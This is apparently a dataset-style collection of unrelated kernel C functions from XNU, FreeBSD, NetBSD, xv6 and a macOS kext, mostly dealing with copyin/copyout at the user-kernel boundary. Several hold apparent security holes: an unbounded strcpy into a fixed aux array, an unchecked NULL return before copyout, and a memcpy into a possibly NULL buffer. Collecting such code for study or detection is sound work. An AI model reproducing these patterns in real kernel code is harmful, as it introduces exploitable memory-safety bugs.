*/ ret = vm_map_enter_mem_object_control(map, &map_addr, map_size, (mach_vm_offset_t)0, VM_FLAGS_FIXED, control, map_offset, TRUE, initprot, maxprot, VM_INHERIT_DEFAULT); if (ret != KERN_SUCCESS) { return (LOAD_NOSPACE); } /* * If the file didn't end on a page boundary, * we need to zero the leftover. */ delta_size = map_size - scp->filesize; #if FIXME if (delta_size > 0) { mach_vm_offset_t tmp; ret = mach_vm_allocate(kernel_map, &tmp, delta_size, VM_FLAGS_ANYWHERE); if (ret != KERN_SUCCESS) return(LOAD_RESOURCE); if (copyout(tmp, map_addr + scp->filesize, delta_size)) { (void) mach_vm_deallocate( kernel_map, tmp, delta_size); return (LOAD_FAILURE); } (void) mach_vm_deallocate(kernel_map, tmp, delta_size); } #endif /* FIXME */ } /* * If the virtual size of the segment is greater * than the size from the file, we need to allocate * zero fill memory for the rest. */ delta_size = seg_size - map_size; if (delta_size > 0) { mach_vm_offset_t tmp = map_addr + map_size; ret = mach_vm_map(map, &tmp, delta_size, 0, VM_FLAGS_FIXED, NULL, 0, FALSE, scp->initprot, scp->maxprot, VM_INHERIT_DEFAULT); if (ret != KERN_SUCCESS) return(LOAD_NOSPACE); } if ( (scp->fileoff == 0) && (scp->filesize != 0) ) result->mach_header = map_addr; if (scp->flags & SG_PROTECTED_VERSION_1) { ret = unprotect_segment(scp->fileoff, scp->filesize, vp, pager_offset, map, map_addr, map_size); } else { ret = LOAD_SUCCESS; } if (LOAD_SUCCESS == ret && filetype == MH_DYLINKER && result->all_image_info_addr == MACH_VM_MIN_ADDRESS) note_all_image_info_section(scp, LC_SEGMENT_64 == lcp->cmd, single_section_size, (const char *)lcp + segment_command_size, slide, result); if ((result->entry_point >= map_addr) && (result->entry_point < (map_addr + map_size))) result->validentry = 1; return ret; }
/* * Handle ioctl requests from the diagnostic interface. * * The initial part of this code resembles ath_ioctl_diag(); * it's likely a good idea to reduce duplication between * these two routines. */ int ath_ioctl_phyerr(struct ath_softc *sc, struct ath_diag *ad) { unsigned int id = ad->ad_id & ATH_DIAG_ID; void *indata = NULL; void *outdata = NULL; u_int32_t insize = ad->ad_in_size; u_int32_t outsize = ad->ad_out_size; int error = 0; HAL_PHYERR_PARAM peout; HAL_PHYERR_PARAM *pe; if (ad->ad_id & ATH_DIAG_IN) { /* * Copy in data. */ indata = malloc(insize, M_TEMP, M_NOWAIT); if (indata == NULL) { error = ENOMEM; goto bad; } error = copyin(ad->ad_in_data, indata, insize); if (error) goto bad; } if (ad->ad_id & ATH_DIAG_DYN) { /* * Allocate a buffer for the results (otherwise the HAL * returns a pointer to a buffer where we can read the * results). Note that we depend on the HAL leaving this * pointer for us to use below in reclaiming the buffer; * may want to be more defensive. */ outdata = malloc(outsize, M_TEMP, M_NOWAIT); if (outdata == NULL) { error = ENOMEM; goto bad; } } switch (id) { case DFS_SET_THRESH: if (insize < sizeof(HAL_PHYERR_PARAM)) { error = EINVAL; break; } pe = (HAL_PHYERR_PARAM *) indata; ath_hal_enabledfs(sc->sc_ah, pe); break; case DFS_GET_THRESH: memset(&peout, 0, sizeof(peout)); outsize = sizeof(HAL_PHYERR_PARAM); ath_hal_getdfsthresh(sc->sc_ah, &peout); pe = (HAL_PHYERR_PARAM *) outdata; memcpy(pe, &peout, sizeof(*pe)); break; default: error = EINVAL; } if (outsize < ad->ad_out_size) ad->ad_out_size = outsize; if (outdata && copyout(outdata, ad->ad_out_data, ad->ad_out_size)) error = EFAULT; bad: if ((ad->ad_id & ATH_DIAG_IN) && indata != NULL) free(indata, M_TEMP); if ((ad->ad_id & ATH_DIAG_DYN) && outdata != NULL) free(outdata, M_TEMP); return error; }
/*
 * Ioctl handler for the IDT77252 ("patm") ATM network interface.
 * Handles interface bring-up/down, media changes (including the chip's
 * idle/unassigned-cell quirk), MTU changes and VCC open/close/list
 * requests.  Returns 0 or an errno.
 */
int
patm_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data)
{
	struct ifreq *ifr = (struct ifreq *)data;
	struct ifaddr *ifa = (struct ifaddr *)data;
	struct patm_softc *sc = ifp->if_softc;
	int error = 0;
	uint32_t cfg;
	struct atmio_vcctable *vtab;

	switch (cmd) {

	  case SIOCSIFADDR:
		/* Assigning an address implicitly brings the interface up. */
		mtx_lock(&sc->mtx);
		ifp->if_flags |= IFF_UP;
		if (!(ifp->if_drv_flags & IFF_DRV_RUNNING))
			patm_initialize(sc);
		switch (ifa->ifa_addr->sa_family) {
#ifdef INET
		  case AF_INET:
		  case AF_INET6:
			ifa->ifa_rtrequest = atm_rtrequest;
			break;
#endif
		  default:
			break;
		}
		mtx_unlock(&sc->mtx);
		break;

	  case SIOCSIFFLAGS:
		/* Reconcile running state with the IFF_UP flag. */
		mtx_lock(&sc->mtx);
		if (ifp->if_flags & IFF_UP) {
			if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) {
				patm_initialize(sc);
			}
		} else {
			if (ifp->if_drv_flags & IFF_DRV_RUNNING) {
				patm_stop(sc);
			}
		}
		mtx_unlock(&sc->mtx);
		break;

	  case SIOCGIFMEDIA:
	  case SIOCSIFMEDIA:
		error = ifmedia_ioctl(ifp, ifr, &sc->media, cmd);

		/*
		 * We need to toggle unassigned/idle cells ourself because
		 * the 77252 generates null cells for spacing. When switching
		 * null cells of it gets the timing wrong.
		 */
		mtx_lock(&sc->mtx);
		if (ifp->if_drv_flags & IFF_DRV_RUNNING) {
			if (sc->utopia.state & UTP_ST_UNASS) {
				if (!(sc->flags & PATM_UNASS)) {
					cfg = patm_nor_read(sc, IDT_NOR_CFG);
					cfg &= ~IDT_CFG_IDLECLP;
					patm_nor_write(sc, IDT_NOR_CFG, cfg);
					sc->flags |= PATM_UNASS;
				}
			} else {
				if (sc->flags & PATM_UNASS) {
					cfg = patm_nor_read(sc, IDT_NOR_CFG);
					cfg |= IDT_CFG_IDLECLP;
					patm_nor_write(sc, IDT_NOR_CFG, cfg);
					sc->flags &= ~PATM_UNASS;
				}
			}
		} else {
			/* Not running: just remember the desired mode. */
			if (sc->utopia.state & UTP_ST_UNASS)
				sc->flags |= PATM_UNASS;
			else
				sc->flags &= ~PATM_UNASS;
		}
		mtx_unlock(&sc->mtx);
		break;

	  case SIOCSIFMTU:
		/*
		 * Set the interface MTU.
		 */
		if (ifr->ifr_mtu > ATMMTU)
			error = EINVAL;
		else
			ifp->if_mtu = ifr->ifr_mtu;
		break;

	  case SIOCATMOPENVCC:		/* kernel internal use */
		error = patm_open_vcc(sc, (struct atmio_openvcc *)data);
		break;

	  case SIOCATMCLOSEVCC:		/* kernel internal use */
		error = patm_close_vcc(sc, (struct atmio_closevcc *)data);
		break;

	  case SIOCATMGVCCS:	/* external use */
#ifdef CPU_CHERI
#error Unvalidatable ifr_data use. Unsafe with CheriABI.
#endif
		/* return vcc table */
		/* NOTE(review): unlike SIOCATMGETVCCS below, the return of
		 * atm_getvccs() is not checked for NULL here — confirm the
		 * M_WAITOK-style contract of this call path. */
		vtab = atm_getvccs((struct atmio_vcc **)sc->vccs,
		    sc->mmap->max_conn, sc->vccs_open, &sc->mtx, 1);
		error = copyout(vtab, ifr->ifr_data, sizeof(*vtab) +
		    vtab->count * sizeof(vtab->vccs[0]));
		free(vtab, M_DEVBUF);
		break;

	  case SIOCATMGETVCCS:	/* netgraph internal use */
		vtab = atm_getvccs((struct atmio_vcc **)sc->vccs,
		    sc->mmap->max_conn, sc->vccs_open, &sc->mtx, 0);
		if (vtab == NULL) {
			error = ENOMEM;
			break;
		}
		*(void **)data = vtab;
		break;

	  default:
		patm_debug(sc, IOCTL, "unknown cmd=%08lx arg=%p", cmd, data);
		error = EINVAL;
		break;
	}

	return (error);
}
int exec(char *path, char **argv) { char *s, *last; int i, off; uint argc, sz, sp, ustack[3+MAXARG+1]; struct elfhdr elf; struct inode *ip; struct proghdr ph; pde_t *pgdir, *oldpgdir; begin_op(); if((ip = namei(path)) == 0){ end_op(); return -1; } ilock(ip); pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) < sizeof(elf)) goto bad; if(elf.magic != ELF_MAGIC) goto bad; if((pgdir = setupkvm()) == 0) goto bad; // Load program into memory. sz = 0; for(i=0, off=elf.phoff; i<elf.phnum; i++, off+=sizeof(ph)){ if(readi(ip, (char*)&ph, off, sizeof(ph)) != sizeof(ph)) goto bad; if(ph.type != ELF_PROG_LOAD) continue; if(ph.memsz < ph.filesz) goto bad; if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0) goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) goto bad; } iunlockput(ip); end_op(); ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. for(last=s=path; *s; s++) if(*s == '/') last = s+1; safestrcpy(proc->name, last, sizeof(proc->name)); // Commit to the user image. 
oldpgdir = proc->pgdir; proc->pgdir = pgdir; proc->sz = sz; proc->tf->eip = elf.entry; // main proc->tf->esp = sp; proc->signal = (void*) -1; //when exe put -1 in signals switchuvm(proc); freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); if(ip){ iunlockput(ip); end_op(); } return -1; }
// Synchronous bridge call from the user-space client: copies the caller's
// buffer into the kernel, passes it to handle_synchronized_communication(),
// then copies the (possibly modified) buffer back out through the same user
// pointer.  The whole call is serialized by the kext-wide GlobalLock.
// Returns kIOReturnSuccess or an IOReturn error code.
IOReturn USERCLIENT_KEXT_CLASSNAME::callback_synchronized_communication(const BridgeUserClientStruct* inputdata, uint64_t* outputdata)
{
	// Take the global lock for the duration of the call.
	KEXT_NAMESPACE::GlobalLock::ScopedLock lk;
	if (! lk) return kIOReturnCannotLock;

	IOReturn result = kIOReturnError;
	uint8_t* buffer = NULL;
	size_t size = 0;

	if (! inputdata || ! outputdata) {
		result = kIOReturnBadArgument;
		IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnBadArgument\n");
		goto finish;
	}

	if (provider_ == NULL || isInactive()) {
		// Return an error if we don't have a provider. This could happen if the user process
		// called callback_synchronized_communication without calling IOServiceOpen first.
		// Or, the user client could be in the process of being terminated and is thus inactive.
		result = kIOReturnNotAttached;
		IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnNotAttached\n");
		goto finish;
	}

	if (! provider_->isOpen(this)) {
		// Return an error if we do not have the driver open. This could happen if the user process
		// did not call callback_open before calling this function.
		result = kIOReturnNotOpen;
		IOLOG_ERROR("UserClient_kext::callback_synchronized_communication kIOReturnNotOpen\n");
		goto finish;
	}

	size = static_cast<size_t>(inputdata->size);
	if (size == 0) {
		// NOTE(review): falls through with the generic kIOReturnError
		// rather than kIOReturnBadArgument — confirm this is intended.
		IOLOG_ERROR("callback_synchronized_communication size == 0\n");
		goto finish;
	}

	buffer = new uint8_t[size];
	if (! buffer) {
		IOLOG_ERROR("callback_synchronized_communication buffer is null\n");
		goto finish;
	}

	// Bring the user-space payload into the kernel buffer.
	if (copyin(inputdata->data, buffer, size) != 0) {
		IOLOG_ERROR("callback_synchronized_communication copyin is failed.\n");
		goto finish;
	}

	handle_synchronized_communication(inputdata->type, inputdata->option,
	    buffer, size, outputdata);

	// Write the (possibly modified) buffer back to user space.
	if (copyout(buffer, inputdata->data, size) != 0) {
		IOLOG_ERROR("callback_synchronized_communication copyout is failed.\n");
		goto finish;
	}

	result = kIOReturnSuccess;

finish:
	if (buffer) {
		delete[] buffer;
		buffer = NULL;
	}
	return result;
}
static int cpu_ptrace_xstate(struct thread *td, int req, void *addr, int data) { struct ptrace_xstate_info info; char *savefpu; int error; if (!use_xsave) return (EOPNOTSUPP); switch (req) { case PT_GETXSTATE_OLD: npxgetregs(td); savefpu = (char *)(get_pcb_user_save_td(td) + 1); error = copyout(savefpu, addr, cpu_max_ext_state_size - sizeof(union savefpu)); break; case PT_SETXSTATE_OLD: if (data > cpu_max_ext_state_size - sizeof(union savefpu)) { error = EINVAL; break; } savefpu = malloc(data, M_TEMP, M_WAITOK); error = copyin(addr, savefpu, data); if (error == 0) { npxgetregs(td); error = npxsetxstate(td, savefpu, data); } free(savefpu, M_TEMP); break; case PT_GETXSTATE_INFO: if (data != sizeof(info)) { error = EINVAL; break; } info.xsave_len = cpu_max_ext_state_size; info.xsave_mask = xsave_mask; error = copyout(&info, addr, data); break; case PT_GETXSTATE: npxgetregs(td); savefpu = (char *)(get_pcb_user_save_td(td)); error = copyout(savefpu, addr, cpu_max_ext_state_size); break; case PT_SETXSTATE: if (data < sizeof(union savefpu) || data > cpu_max_ext_state_size) { error = EINVAL; break; } savefpu = malloc(data, M_TEMP, M_WAITOK); error = copyin(addr, savefpu, data); if (error == 0) error = npxsetregs(td, (union savefpu *)savefpu, savefpu + sizeof(union savefpu), data - sizeof(union savefpu)); free(savefpu, M_TEMP); break; default: error = EINVAL; break; } return (error); }
/*
 * Build the SVR4 (32-bit emulation) argument and ELF auxiliary vector on
 * the new process stack: first the normal netbsd32 args/env, then the
 * AT_* aux entries a dynamically linked binary needs, then — written
 * inline into the unused tail of the ai[] array and copied out with it —
 * the platform-name string and exec-path string that AT_SUN_PLATFORM and
 * AT_SUN_EXECNAME point at.  Advances *stackp past everything copied out.
 * Returns 0 on success or an errno from the copyout paths.
 */
int
svr4_32_copyargs(struct lwp *l, struct exec_package *pack,
    struct ps_strings *arginfo, char **stackp, void *argp)
{
	size_t len;
	AuxInfo ai[SVR4_32_AUX_ARGSIZ], *a, *platform=NULL, *exec=NULL;
	struct elf_args *ap;
	extern char machine_model[];
	int error;

	/* Standard 32-bit arg/env copyout first; it advances *stackp. */
	if ((error = netbsd32_copyargs(l, pack, arginfo, stackp, argp)) != 0)
		return error;

	a = ai;

	/*
	 * Push extra arguments on the stack needed by dynamically
	 * linked binaries
	 */
	if ((ap = (struct elf_args *)pack->ep_emul_arg)) {
		struct proc *p = curproc;	/* XXXXX */

		/* a_v is patched below once the string's address is known. */
		a->a_type = AT_SUN_PLATFORM;
		platform = a;	/* Patch this later. */
		a++;

		/* Only emit AT_SUN_EXECNAME when the pathname buffer exists. */
		if (pack->ep_ndp->ni_cnd.cn_flags & HASBUF) {
			a->a_type = AT_SUN_EXECNAME;
			exec = a;	/* Patch this later. */
			a++;
		}

		a->a_type = AT_PHDR;
		a->a_v = ap->arg_phaddr;
		a++;

		a->a_type = AT_PHENT;
		a->a_v = ap->arg_phentsize;
		a++;

		a->a_type = AT_PHNUM;
		a->a_v = ap->arg_phnum;
		a++;

		a->a_type = AT_ENTRY;
		a->a_v = ap->arg_entry;
		a++;

		a->a_type = AT_BASE;
		a->a_v = ap->arg_interp;
		a++;

		if (sun_flags) {
			a->a_type = AT_FLAGS;
			a->a_v = sun_flags;
			a++;
		}

		a->a_type = AT_PAGESZ;
		a->a_v = PAGE_SIZE;
		a++;

		a->a_type = AT_EUID;
		a->a_v = kauth_cred_geteuid(l->l_cred);
		a++;

		a->a_type = AT_RUID;
		a->a_v = kauth_cred_getuid(l->l_cred);
		a++;

		a->a_type = AT_EGID;
		a->a_v = kauth_cred_getegid(l->l_cred);
		a++;

		a->a_type = AT_RGID;
		a->a_v = kauth_cred_getgid(l->l_cred);
		a++;

		if (sun_hwcap) {
			a->a_type = AT_SUN_HWCAP;
			a->a_v = sun_hwcap;
			a++;
		}

		/* Aux data consumed; ownership of ap ends here. */
		free((char *)ap, M_TEMP);
		pack->ep_emul_arg = NULL;
	}

	/* Terminate the aux vector. */
	a->a_type = AT_NULL;
	a->a_v = 0;
	a++;

	len = (a - ai) * sizeof(AuxInfo);

	if (platform) {
		/*
		 * The strings are written into the unused tail of ai[],
		 * immediately after the last aux entry, so a single copyout
		 * below moves entries and strings together.
		 * NOTE(review): this assumes SVR4_32_AUX_ARGSIZ leaves enough
		 * slack after the emitted entries for machine_model plus the
		 * exec path — confirm the array sizing against the longest
		 * possible cn_pnbuf.
		 */
		char *ptr = (char *)a;
		const char *path = NULL;

		/* Copy out the platform name. */
		platform->a_v = (u_long)(*stackp) + len;
		/* XXXX extremely inefficient.... */
		strcpy(ptr, machine_model);
		ptr += strlen(machine_model) + 1;
		len += strlen(machine_model) + 1;

		if (exec) {
			path = pack->ep_ndp->ni_cnd.cn_pnbuf;

			/* Copy out the file we're executing. */
			exec->a_v = (u_long)(*stackp) + len;
			strcpy(ptr, path);
			len += strlen(ptr)+1;
		}

		/* Round len up to an 8-byte (64-bit) boundary. */
		len = (len+7)&~0x7L;
	}
	/* One copyout for the aux entries plus the trailing strings. */
	if ((error = copyout(ai, *stackp, len)) != 0)
		return error;
	*stackp += len;
	return error;
}